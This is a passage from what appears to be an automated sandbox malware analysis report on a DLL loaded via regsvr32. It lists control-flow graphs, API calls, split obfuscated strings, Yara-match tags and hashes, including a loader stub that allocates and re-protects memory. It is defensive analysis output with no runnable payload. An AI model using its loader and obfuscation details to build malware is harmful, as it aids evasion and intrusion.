API calls 17437->17438 17438->17442 17440 7fef9d3f592 17439->17440 17441 7fef9d3afb0 _fflush_nolock 17 API calls 17440->17441 17441->17433 17442->17414 18442 7fef9d41370 18443 7fef9d3af60 _unlock_file2 2 API calls 18442->18443 18444 7fef9d41390 18443->18444 16612 7fef9d28860 HeapCreate 16613 7fef9d28891 GetVersion 16612->16613 16614 7fef9d2888d 16612->16614 16615 7fef9d288c1 16613->16615 16616 7fef9d288a7 HeapSetInformation 16613->16616 16615->16614 16616->16615 18445 7fef9d31b64 18447 7fef9d31b9d 18445->18447 18446 7fef9d3ab10 17 API calls 18448 7fef9d31c86 18446->18448 18447->18446 18447->18448 18449 7fef9d31bed 18447->18449 18448->18449 18450 7fef9d39290 23 API calls 18448->18450 18450->18449 18877 7fef9d35260 18878 7fef9d35296 __SehTransFilter _CreateFrameInfo 18877->18878 18879 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18878->18879 18880 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18879->18880 17443 7fef9d41160 17446 7fef9d34e90 17443->17446 17445 7fef9d41179 17447 7fef9d34ebb 17446->17447 17448 7fef9d34ecf 17446->17448 17447->17448 17449 7fef9d2cf50 terminate 35 API calls 17447->17449 17448->17445 17449->17448 18458 7fef9d3bb66 18459 7fef9d3bb78 _CrtMemDumpAllObjectsSince wcsxfrm 18458->18459 18460 7fef9d3bc46 18459->18460 18462 7fef9d3b99c 18459->18462 18461 7fef9d2bd70 _invalid_parameter 17 API calls 18460->18461 18466 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18461->18466 18463 7fef9d3cc93 18462->18463 18467 7fef9d3bada 18462->18467 18464 7fef9d2bd70 _invalid_parameter 17 API calls 18463->18464 18463->18466 18464->18466 18465 7fef9d23280 __GSHandlerCheck 8 API calls 18468 7fef9d3cd90 18465->18468 18466->18465 18469 7fef9d2bd70 _invalid_parameter 17 API calls 18467->18469 18469->18466

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                                                    • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                                    • API String ID: 2181984824-2032897877
                                                                    • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                    • Instruction ID: 1e3beb4b4c43f569e156fbbbb3a48c6786d138466eab30fa5612b4063b7ac052
                                                                    • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                    • Instruction Fuzzy Hash: 72E2C9B690A7C18FE3748F629E857DD3AA0F345748F609208D3991FA1DCB795242CF86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 15 1d0000-1d0460 call 1d0aa8 * 2 VirtualAlloc 37 1d048a-1d0494 15->37 38 1d0462-1d0466 15->38 41 1d049a-1d049e 37->41 42 1d0a91-1d0aa6 37->42 39 1d0468-1d0488 38->39 39->37 39->39 41->42 43 1d04a4-1d04a8 41->43 43->42 44 1d04ae-1d04b2 43->44 44->42 45 1d04b8-1d04bf 44->45 45->42 46 1d04c5-1d04d2 45->46 46->42 47 1d04d8-1d04e1 46->47 47->42 48 1d04e7-1d04f4 47->48 48->42 49 1d04fa-1d0507 48->49 50 1d0509-1d0511 49->50 51 1d0531-1d0567 GetNativeSystemInfo 49->51 52 1d0513-1d0518 50->52 51->42 53 1d056d-1d0589 VirtualAlloc 51->53 54 1d051a-1d051f 52->54 55 1d0521 52->55 56 1d058b-1d059e 53->56 57 1d05a0-1d05ac 53->57 58 1d0523-1d052f 54->58 55->58 56->57 59 1d05af-1d05b2 57->59 58->51 58->52 61 1d05b4-1d05bf 59->61 62 1d05c1-1d05db 59->62 61->59 63 1d05dd-1d05e2 62->63 64 1d061b-1d0622 62->64 65 1d05e4-1d05ea 63->65 66 1d0628-1d062f 64->66 67 1d06db-1d06e2 64->67 68 1d05ec-1d0609 65->68 69 1d060b-1d0619 65->69 66->67 70 1d0635-1d0642 66->70 71 1d06e8-1d06f9 67->71 72 1d0864-1d086b 67->72 68->68 68->69 69->64 69->65 70->67 75 1d0648-1d064f 70->75 76 1d0702-1d0705 71->76 73 1d0917-1d0929 72->73 74 1d0871-1d087f 72->74 77 1d092f-1d0937 73->77 78 1d0a07-1d0a1a 73->78 79 1d090e-1d0911 74->79 80 1d0654-1d0658 75->80 81 1d06fb-1d06ff 76->81 82 1d0707-1d070a 76->82 84 1d093b-1d093f 77->84 105 1d0a1c-1d0a27 78->105 106 1d0a40-1d0a4a 78->106 79->73 83 1d0884-1d08a9 79->83 85 1d06c0-1d06ca 80->85 81->76 86 1d070c-1d071d 82->86 87 1d0788-1d078e 82->87 110 1d08ab-1d08b1 83->110 111 1d0907-1d090c 83->111 90 1d09ec-1d09fa 84->90 91 1d0945-1d095a 84->91 88 1d06cc-1d06d2 85->88 89 1d065a-1d0669 85->89 92 1d071f-1d0720 86->92 93 1d0794-1d07a2 86->93 87->93 88->80 97 1d06d4-1d06d5 88->97 101 1d066b-1d0678 89->101 102 1d067a-1d067e 89->102 90->84 103 1d0a00-1d0a01 90->103 99 1d095c-1d095e 91->99 100 1d097b-1d097d 91->100 104 1d0722-1d0784 92->104 95 1d085d-1d085e 93->95 96 1d07a8 93->96 95->72 107 1d07ae-1d07d4 96->107 97->67 112 1d096e-1d0979 99->112 113 1d0960-1d096c 99->113 115 1d097f-1d0981 100->115 116 1d09a2-1d09a4 100->116 114 1d06bd-1d06be 101->114 117 1d068c-1d0690 102->117 118 1d0680-1d068a 102->118 103->78 104->104 119 1d0786 104->119 120 1d0a38-1d0a3e 105->120 108 1d0a4c-1d0a54 106->108 109 1d0a7b-1d0a8e 106->109 142 1d0835-1d0839 107->142 143 1d07d6-1d07d9 107->143 108->109 122 1d0a56-1d0a78 108->122 109->42 131 1d08bb-1d08c8 110->131 132 1d08b3-1d08b9 110->132 111->79 123 1d09be-1d09bf 112->123 113->123 114->85 124 1d0989-1d098b 115->124 125 1d0983-1d0987 115->125 129 1d09ac-1d09bb 116->129 130 1d09a6-1d09aa 116->130 127 1d06a5-1d06a9 117->127 128 1d0692-1d06a3 117->128 126 1d06b6-1d06ba 118->126 119->93 120->106 121 1d0a29-1d0a35 120->121 121->120 122->109 137 1d09c5-1d09cb 123->137 124->116 135 1d098d-1d098f 124->135 125->123 126->114 127->114 136 1d06ab-1d06b3 127->136 128->126 129->123 130->123 139 1d08ca-1d08d1 131->139 140 1d08d3-1d08e5 131->140 138 1d08ea-1d08fe 132->138 144 1d0999-1d09a0 135->144 145 1d0991-1d0997 135->145 136->126 146 1d09cd-1d09d3 137->146 147 1d09d9-1d09e9 VirtualProtect 137->147 138->111 153 1d0900-1d0905 138->153 139->139 139->140 140->138 150 1d083b 142->150 151 1d0844-1d0850 142->151 148 1d07db-1d07e1 143->148 149 1d07e3-1d07f0 143->149 144->137 145->123 146->147 147->90 154 1d0812-1d082c 148->154 155 1d07fb-1d080d 149->155 156 1d07f2-1d07f9 149->156 150->151 151->107 157 1d0856-1d0857 151->157 153->110 154->142 159 1d082e-1d0833 154->159 155->154 156->155 156->156 157->95 159->143
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914129745.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1d0000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 2313188843-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: e32d577f96bf42e53fe5b3973e26e6075cf822b90ea1bb18d5f9077e5a7e4597
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: DE72C430618B488BDB1DDF18D8957B9B7E1FB98305F10462EE88AD7311DB34E986CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 344 18002b7b2-18002b823 call 1800075b8 346 18002b828-18002b836 344->346 347 18002b83c-18002b848 346->347 348 18002b769-18002b76f 347->348 349 18002b775 348->349 350 18002b9bc-18002b9c2 348->350 351 18002b77b-18002b781 349->351 352 18002be19-18002be67 call 180024104 349->352 353 18002bdb2-18002bdfb call 180024104 350->353 354 18002b9c8-18002b9ce 350->354 355 18002b9b2-18002b9b7 351->355 356 18002b787-18002b78d 351->356 367 18002be6c-18002be8c 352->367 374 18002be00-18002be09 353->374 357 18002b9d4-18002b9da 354->357 358 18002bc32-18002bdb0 call 180003a18 call 18001958c 354->358 355->348 362 18002b793-18002b799 356->362 363 18002b91c-18002b9a3 call 18001a6a8 356->363 364 18002bb99-18002bc22 call 180029374 357->364 365 18002b9e0-18002b9e6 357->365 358->374 370 18002b867-18002b917 call 180029374 362->370 371 18002b79f-18002b7a5 362->371 377 18002b9a8-18002b9ad 363->377 364->367 384 18002bc28-18002bc2d 364->384 372 18002be0c-18002be12 365->372 373 18002b9ec-18002bafc call 180018fd8 365->373 370->347 379 18002b7ab-18002b7b1 371->379 380 18002b84d-18002b862 371->380 372->367 382 18002be14 372->382 373->377 388 18002bb02-18002bb94 call 180013fc0 373->388 374->372 377->347 379->344 379->372 380->348 382->348 384->347 388->347
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: j$BaG$E^7$i1V$m?${=/
                                                                    • API String ID: 0-1718370006
                                                                    • Opcode ID: 7e95e28927a3f474dec44438ef6f7c2193a6ae12a65f48f1ee29bcd4551fec0f
                                                                    • Instruction ID: c2786c6f7bce021451845d5168b6505f680b7f0c5368ce25f063ff62f9696b2b
                                                                    • Opcode Fuzzy Hash: 7e95e28927a3f474dec44438ef6f7c2193a6ae12a65f48f1ee29bcd4551fec0f
                                                                    • Instruction Fuzzy Hash: 64223B70E4870DDBCB59DFA8C4AA6DEBBF6FB44344F0081A9D805A7290DB74560ACB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $E$&C$b $z_o^$]o-
                                                                    • API String ID: 0-182765021
                                                                    • Opcode ID: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                                    • Instruction ID: b82cae2a5c5b3167ef3d8ad315f999371e1e8449cd72bf967428ee4211bfb190
                                                                    • Opcode Fuzzy Hash: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                                    • Instruction Fuzzy Hash: 5CE1277151468CDFDF88DF28C889ADD3BA1FB483A8F956219FD0A97250D774D888CB84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8$?I $k?@`${>K$s
                                                                    • API String ID: 0-923624899
                                                                    • Opcode ID: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                                    • Instruction ID: ebffd08f5432af4d9268e2276ec0df8890e8c351c8fd12e1d0a52c84a5ba0a07
                                                                    • Opcode Fuzzy Hash: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                                    • Instruction Fuzzy Hash: F4C1F070519784ABC388DF24C4CA95BBBF1FBD4758F906A1CF9C68A260D774D948CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 441 18000e99c-18000e9ca 442 18000e9cc 441->442 443 18000e9ce-18000e9d4 442->443 444 18000e9da-18000e9e0 443->444 445 18000ee1d-18000f007 call 1800138d0 call 180028908 443->445 446 18000ee13-18000ee18 444->446 447 18000e9e6-18000e9ec 444->447 462 18000f009 445->462 463 18000f00e-18000f202 call 180028908 call 180017d54 445->463 446->443 449 18000e9f2-18000e9f8 447->449 450 18000ea99-18000eaa6 447->450 452 18000f20d-18000f213 449->452 453 18000e9fe-18000ea89 call 180028724 449->453 455 18000eaa8-18000eaae 450->455 456 18000eab0-18000ead3 450->456 452->443 457 18000f219-18000f226 452->457 453->457 465 18000ea8f-18000ea94 453->465 460 18000ead9-18000edf1 call 180001000 call 180028908 call 180017d54 455->460 456->460 475 18000edf6-18000edfe 460->475 462->463 463->442 474 18000f208 463->474 465->443 474->452 475->457 476 18000ee04-18000ee0e 475->476 476->443
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: &k8$,8$\$`/U
                                                                    • API String ID: 0-956392518
                                                                    • Opcode ID: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                                    • Instruction ID: eb6f1617cd975c6e10cf27e40abea16f203efbb492656816d2660eb5cb9ff966
                                                                    • Opcode Fuzzy Hash: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                                    • Instruction Fuzzy Hash: 7D2215715093C88BDBBECF64C889BDA7BB9FB44708F10561CEA4A9E258DB745748CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 477 7fef9d28860-7fef9d2888b HeapCreate 478 7fef9d28891-7fef9d288a5 GetVersion 477->478 479 7fef9d2888d-7fef9d2888f 477->479 481 7fef9d288c1 478->481 482 7fef9d288a7-7fef9d288bb HeapSetInformation 478->482 480 7fef9d288c6-7fef9d288ca 479->480 481->480 482->481
                                                                    APIs
                                                                    • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28876
                                                                    • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28891
                                                                    • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D288BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CreateInformationVersion
                                                                    • String ID:
                                                                    • API String ID: 3563531100-0
                                                                    • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                                    • Instruction ID: 9235811b63a60011062a1442a231d54292fe2d432e51c42db702af6c27d11e97
                                                                    • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                                    • Instruction Fuzzy Hash: 50F0FE74A18A4282F7949729AC0977E63D0B758345FA1C43696CD826B4DF3F9589C601
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 483 180025a4c-180025a83 484 180025a85-180025a8a 483->484 485 180025f34-180025f39 call 180016da8 484->485 486 180025a90-180025a95 484->486 497 180025f3e-180025f43 485->497 487 180025a9b-180025aa0 486->487 488 180025e5e-180025f2f call 180029374 486->488 490 180025e35-180025e53 487->490 491 180025aa6-180025aab 487->491 488->484 490->488 494 180025ab1-180025ab6 491->494 495 180025cff-180025e1c call 180001000 491->495 499 180025abc-180025ac1 494->499 500 180025cf0-180025cfa 494->500 503 180025e21-180025e30 495->503 501 180025f49 497->501 502 180026060-18002606d 497->502 504 180025c24-180025ce1 call 18001958c 499->504 505 180025ac7-180025acc 499->505 500->484 501->484 503->484 509 180025ce6-180025ceb 504->509 507 180025ad2-180025ad7 505->507 508 180025f4e-18002605a call 180028724 call 18001c064 505->508 507->497 511 180025add-180025bf1 call 180020048 507->511 508->502 509->484 515 180025bf6-180025bfc 511->515 517 180025c1a-180025c1f 515->517 518 180025bfe-180025c15 515->518 517->484 518->484
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6"*n$US8$z:7
                                                                    • API String ID: 0-1851205513
                                                                    • Opcode ID: 1606357dec85794d189ee26d92c7f71c49412cbd8f38d505c9803facb48510e7
                                                                    • Instruction ID: 607295142d9547307d046de48b3748fa472aee76cf77032a28cf9f5936a2d7e5
                                                                    • Opcode Fuzzy Hash: 1606357dec85794d189ee26d92c7f71c49412cbd8f38d505c9803facb48510e7
                                                                    • Instruction Fuzzy Hash: 57E1F9706057889FEBBADF24C88A7DE7BA1FB49744F50422DDC8A8E250DB745648CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 519 180020118-180020142 520 180020147-18002014c 519->520 521 180020152-180020157 520->521 522 180020380-1800203f5 call 1800075b8 520->522 523 180020358-180020366 521->523 524 18002015d-180020162 521->524 535 180020401 522->535 536 1800203f7-1800203fc 522->536 526 18002036c-180020370 523->526 527 180020412-180020484 call 18001958c 524->527 528 180020168-18002016d 524->528 533 180020372-18002037b 526->533 534 180020368-180020369 526->534 537 180020489-180020495 527->537 531 180020173-180020178 528->531 532 18002034e-180020353 528->532 538 1800202c8-180020349 call 18001958c 531->538 539 18002017e-180020183 531->539 532->520 533->520 534->526 540 180020406-18002040b 535->540 536->520 538->520 543 180020189-18002018e 539->543 544 18002021d-1800202ad call 180020048 539->544 540->537 541 18002040d 540->541 541->520 543->540 546 180020194-180020218 call 1800011f4 543->546 548 1800202b2-1800202b8 544->548 546->520 548->537 550 1800202be-1800202c3 548->550 550->520
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -;$-;$00
                                                                    • API String ID: 0-2539125404
                                                                    • Opcode ID: 4bebef8070dd7c101eddf85a5aa64f5999e83061b5374efcb24450239016e0dd
                                                                    • Instruction ID: 193f60ccd2842279d11af0df6a42cb9b90b2b7ab7c379db6368ea7840d008f1f
                                                                    • Opcode Fuzzy Hash: 4bebef8070dd7c101eddf85a5aa64f5999e83061b5374efcb24450239016e0dd
                                                                    • Instruction Fuzzy Hash: 28A1377051478CDBDBAADF28C8C9AD93BA1FF48394FA05219FD0287251CB75D985CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: f+hb$zm
                                                                    • API String ID: 0-4294548274
                                                                    • Opcode ID: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                                    • Instruction ID: b2f4f577a3df5b024e80de80ecfd692f42b94ed80d4232126a84951cd6e5a716
                                                                    • Opcode Fuzzy Hash: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                                    • Instruction Fuzzy Hash: 4852C97050068D8FDF98DF68C8866DA3BA1FB58388F124319FC8AA7291D778D655CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #U6
                                                                    • API String ID: 0-3443268899
                                                                    • Opcode ID: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                                    • Instruction ID: 59d24509ec93e958c93c94dd97d6e32fc772fd919bc53da4f0cdd3954875abf9
                                                                    • Opcode Fuzzy Hash: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                                    • Instruction Fuzzy Hash: 57510E715087888BC7B8DF28C49A6CBBBF1FF86344F10091DE68987260CB76D949CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 160 7fef9d27640-7fef9d27671 GetStartupInfoW call 7fef9d24980 162 7fef9d27676-7fef9d27687 160->162 163 7fef9d27693-7fef9d276ac 162->163 164 7fef9d27689-7fef9d2768e 162->164 166 7fef9d276c2-7fef9d276d7 163->166 165 7fef9d27cee-7fef9d27cf5 164->165 167 7fef9d2777d-7fef9d27784 166->167 168 7fef9d276dd-7fef9d27778 166->168 170 7fef9d27ad6-7fef9d27afb 167->170 171 7fef9d2778a-7fef9d27790 167->171 168->166 174 7fef9d27b01-7fef9d27b2e 170->174 175 7fef9d27ce0-7fef9d27cec SetHandleCount 170->175 171->170 172 7fef9d27796-7fef9d277de 171->172 176 7fef9d277f0 172->176 177 7fef9d277e0-7fef9d277ee 172->177 178 7fef9d27b30-7fef9d27b3c 174->178 179 7fef9d27b42-7fef9d27b56 174->179 175->165 180 7fef9d277fb-7fef9d27833 176->180 177->180 178->179 181 7fef9d27cc0-7fef9d27cd8 178->181 182 7fef9d27b65-7fef9d27b6d 179->182 183 7fef9d27b58-7fef9d27b63 179->183 186 7fef9d27975-7fef9d279c7 180->186 187 7fef9d27839-7fef9d2786e call 7fef9d24980 180->187 188 7fef9d27cdb 181->188 189 7fef9d27b6f-7fef9d27b7a 182->189 190 7fef9d27b7c 182->190 185 7fef9d27b95-7fef9d27bb3 GetStdHandle 183->185 191 7fef9d27c95-7fef9d27cb7 185->191 192 7fef9d27bb9-7fef9d27bc2 185->192 186->170 196 7fef9d279cd-7fef9d279d9 186->196 203 7fef9d27870-7fef9d2787d 187->203 204 7fef9d27882-7fef9d278ac 187->204 188->175 195 7fef9d27b87-7fef9d27b8e 189->195 190->195 198 7fef9d27cbe 191->198 192->191 197 7fef9d27bc8-7fef9d27be5 GetFileType 192->197 195->185 200 7fef9d27ad1 196->200 201 7fef9d279df-7fef9d279eb 196->201 197->191 202 7fef9d27beb-7fef9d27c0d 197->202 198->188 200->170 201->200 205 7fef9d279f1-7fef9d27a01 201->205 206 7fef9d27c0f-7fef9d27c29 202->206 207 7fef9d27c2b-7fef9d27c3a 202->207 203->186 208 7fef9d278c2-7fef9d278e3 204->208 205->200 209 7fef9d27a07-7fef9d27a17 205->209 210 7fef9d27c56-7fef9d27c72 InitializeCriticalSectionAndSpinCount 206->210 207->210 211 7fef9d27c3c-7fef9d27c53 207->211 212 7fef9d27970 208->212 213 7fef9d278e9-7fef9d2796b 208->213 215 7fef9d27a32-7fef9d27aad InitializeCriticalSectionAndSpinCount 209->215 216 7fef9d27a19-7fef9d27a2c GetFileType 209->216 217 7fef9d27c74-7fef9d27c79 210->217 218 7fef9d27c7b-7fef9d27c93 210->218 211->210 212->186 213->208 219 7fef9d27aaf-7fef9d27ab4 215->219 220 7fef9d27ab9-7fef9d27ace 215->220 216->200 216->215 217->165 218->198 219->165 220->200
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                                    • API String ID: 1930727954-3864165772
                                                                    • Opcode ID: 6ce8cb6e1d9cf3b4bca9567c45291f9c0e6eb32f85ec4de2f3338e3031d5b08d
                                                                    • Instruction ID: 1d91a8b9fbbdfe7efb2cec2f51c290a43986955e3ccc02e10ec1e86e5f3f07e0
                                                                    • Opcode Fuzzy Hash: 6ce8cb6e1d9cf3b4bca9567c45291f9c0e6eb32f85ec4de2f3338e3031d5b08d
                                                                    • Instruction Fuzzy Hash: 88F1D82260DBC5C9E7B08B19E88076EB7A0F385B64F258226CAED477E4DB3DD445CB11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
